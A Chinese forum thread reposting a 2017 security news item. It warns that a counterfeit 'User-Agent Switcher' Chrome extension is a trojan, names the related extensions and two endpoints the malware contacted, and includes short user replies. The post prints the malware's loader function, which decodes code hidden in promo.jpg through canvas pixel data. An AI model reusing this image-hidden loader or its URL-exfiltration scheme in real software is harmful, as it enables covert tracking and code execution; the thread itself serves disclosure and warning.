搜索
查看: 3185|回复: 40
收起左侧

[软件相关] 快讯 丨流行Chrome插件User-Agent Switcher为木马程序,请尽快卸载

  [复制链接]
firethreat
发表于 2017-9-11 13:35:18 | 显示全部楼层 |阅读模式
本帖最后由 firethreat 于 2017-9-12 01:50 编辑

楼主注:看到有饭友说卸载了,注意,注意,这个报道里面有问题的插件是山寨版,山寨的!如果你用的原版没问题,注意看你是否下载到山寨版!特别不希望引起大家卸载原版,给原作者带来负面影响。

刚刚曝出的消息,Chrome商店搜索User-Agent Switcher,排名第一的插件居然是一款木马程序!而这款工具,很多安全技术人员也都在使用。

这款插件的表面功能是使Chrome可以转换为别的浏览器进行访问,如IE、Safari、360甚至iOS、 Android等移动浏览器,方便用户进行测试。此外,User-Agent Switcher还可以修改浏览器的UA,支持自动切换模式,让Chrome始终用指定的UA去访问某些网站。

但是,这款插件其实是一个包含恶意代码的木马程序。打开谷歌应用商店(插件地址),可以看到其用户数超过45万人,截至发稿共有1300多名用户对其进行了评价,平均评分4.38颗星。

插件截图

为了绕过Chrome的审核策略,其作者把恶意代码隐藏在了promo.jpg里。插件的background.js第80行代码,可以从图片里解密出恶意代码并执行。

t.prototype.Vh=function(t,e){  
if(""==='../promo.jpg')return"";  
void0===t&&(t='../promo.jpg'),t.length&&(t=r.Wk(t)),e=e||{};  
varn=this.ET,  
i=e.mp||n.mp,  
o=e.Tv||n.Tv,  
h=e.At||n.At,  
a=r.Yb(Math.pow(2,i)),  
f=(e.WC||n.WC,e.TY||n.TY),  
u=document.createElement("canvas"),  
p=u.getContext("2d");  
if(u.style.display="none",u.width=e.width||t.width,u.height=e.width||t.height,0===u.width||0===u.height)return"";  
e.height&&e.width?p.drawImage(t,0,0,e.width,e.height):p.drawImage(t,0,0);  
varc=p.getImageData(0,0,u.width,u.height),  
d=c.data,  
g=[];  
if(c.data.every(function(t){  
return0===t  
}))return"";  
varm,s;  
if(1===o)  
for(m=3,s=!1;!s&&m<d.length&&!s;m+=4)s=f(d,m,o),s||g.push(d[m]-(255-a+1));  
varv="",  
w=0,  
y=0,  
l=Math.pow(2,h)-1;  
for(m=0;m<g.length;m+=1)w+=g[m]<<y,y+=i,y>=h&&(v+=String.fromCharCode(w&l),y%=h,w=g[m]>>i-y);  
returnv.length<13?"":(0!==w&&(v+=String.fromCharCode(w&l)),v)  
}

只要执行这段代码,插件就会把你浏览器打开的每个页面的url信息加密发送到这个地址(https://uaswitcher.org/logic/page/data)。另外,该插件还会从地址(http://api.data-monitor.info/api/bhrule?sub=116)获取推广链接规则,当用户打开符合规则的网站时,就会在当前页面植入广告甚至恶意代码。

据悉,该作者还在谷歌应用商店发布了如下几个插件,其安全性同样值得怀疑:
    https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
    https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
    https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa
    https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
请大家检查一下自己的浏览器,如有发现安装,请尽快卸载。

*参考来源:V2EX,本文作者:Akane,转载请注明来自FreeBuf.COM
原文地址:http://www.freebuf.com/news/147188.html
==============================================================
楼主说:
1.第一次发资讯贴,如有违规请删。
2.楼主纯转载,真假未知,本人对内容不负责任
3.这里还有些讨论:https://news.ycombinator.com/item?id=14889619

评分

参与人数 1经验 +11 收起 理由
Tarchia + 11

查看全部评分

julia跺跺
发表于 2017-9-11 13:57:53 | 显示全部楼层
纳尼,竟然还有这种操作
好吧我看错了,这 竟然是个山寨的插件...

评分

参与人数 1人气 +1 收起 理由
奇迹虎_QIHOO + 1 躲躲

查看全部评分

淞小璟
发表于 2017-9-11 14:28:57 | 显示全部楼层
还好,我根本不用谷歌浏览器``````````````````
異鄉人
发表于 2017-9-11 14:49:29 | 显示全部楼层
还好,我根本不用这扩展``````````````````
逆枫寒
发表于 2017-9-11 15:02:45 来自手机 | 显示全部楼层
一年以前chrome区就有人讨论了,下架过一段时间

评分

参与人数 1人气 +1 收起 理由
970137957 + 1 感谢支持,欢迎常来: )

查看全部评分

轻拭泪痕
发表于 2017-9-11 15:22:16 | 显示全部楼层
好可怕,幸好没在使用
小老虎t
发表于 2017-9-11 19:40:24 | 显示全部楼层
赶快检查一下吧,不知道firefox上面的扩展安不安全啊
阿明123
发表于 2017-9-11 20:23:40 | 显示全部楼层
巨汗,我一直在用,怎么补救,
阿连
发表于 2017-9-11 20:33:34 | 显示全部楼层
江湖水太深,我要回农村
chenxipg
发表于 2017-9-11 20:48:23 | 显示全部楼层
捕获.PNG
这应该是原版吧
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2017-11-24 04:34 , Processed in 0.057655 second(s), 9 queries , MemCached On.

快速回复 返回顶部 返回列表